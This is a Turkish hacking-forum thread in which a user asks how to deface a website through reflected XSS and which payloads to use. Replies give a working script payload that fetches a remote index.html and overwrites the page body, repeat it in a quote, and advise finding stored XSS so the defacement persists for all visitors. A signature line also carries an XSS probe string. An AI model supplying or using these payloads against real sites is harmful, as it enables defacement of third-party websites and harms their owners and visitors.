Zararlı Yazılım Reflected XSS ile index atabilirmiyim?

Baypost

Yeni üye
17 Eyl 2021
6
1
25
Merhabalar efendim iyi forumlar dilerim öncelikle reflected xss ile index basabilirmiyim ve hangi payloadlari kullamaliyim önereceğiniz bir yer var ise önerirseniz çok kâfi olur efendim 😊
 

'Herodot

Katılımcı Üye
30 Eyl 2017
487
299
Kuvâ-yi Milliye
Merhaba,

Kod:
<script>fetch("buraya index.html dosya uzantısı").then(response=>response.text()).then(html=>document.body.innerHTML=html);</script>

Bu kodlara indexin olduğu html dosya uzantısını vererek siteye enjekte edebilirsin.
Örneğin github'dan bir index uzantısı alabilirsin veya kendin de hazırlayabilirsin.

Esenlikler dilerim.
 
M

Mustafadaa

Ziyaretçi
Merhaba,

Kod:
<script>fetch("buraya index.html dosya uzantısı").then(response=>response.text()).then(html=>document.body.innerHTML=html);</script>

Bu kodlara indexin olduğu html dosya uzantısını vererek siteye enjekte edebilirsin.
Örneğin github'dan bir index uzantısı alabilirsin veya kendin de hazırlayabilirsin.

Esenlikler dilerim.
sağolun hocamda direk index.html kodlarini yerlestiremezmiyiz
 

P4$A

Uzman üye
13 Tem 2021
1,498
2,845
23
";-alert(1)-//
sağolun hocamda direk index.html kodlarini yerlestiremezmiyiz
kendine bir site kurup veya bir yere index.html sayfanı yükleyip url verdiğin zaman, sitede indexin gözükür fakat reflected olduğu için sadece sende gözükür yani hack değildir bu storeda çevirirsen veya stored xss bulursan aynı yöntemle kodu sokarsan o zaman hacklmeiş olursun
 

Baypost

Yeni üye
17 Eyl 2021
6
1
25
kendine bir site kurup veya bir yere index.html sayfanı yükleyip url verdiğin zaman, sitede indexin gözükür fakat reflected olduğu için sadece sende gözükür yani hack değildir bu storeda çevirirsen veya stored xss bulursan aynı yöntemle kodu sokarsan o zaman hacklmeiş olursun
storede cevirmek gibi birşey olmazmi
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.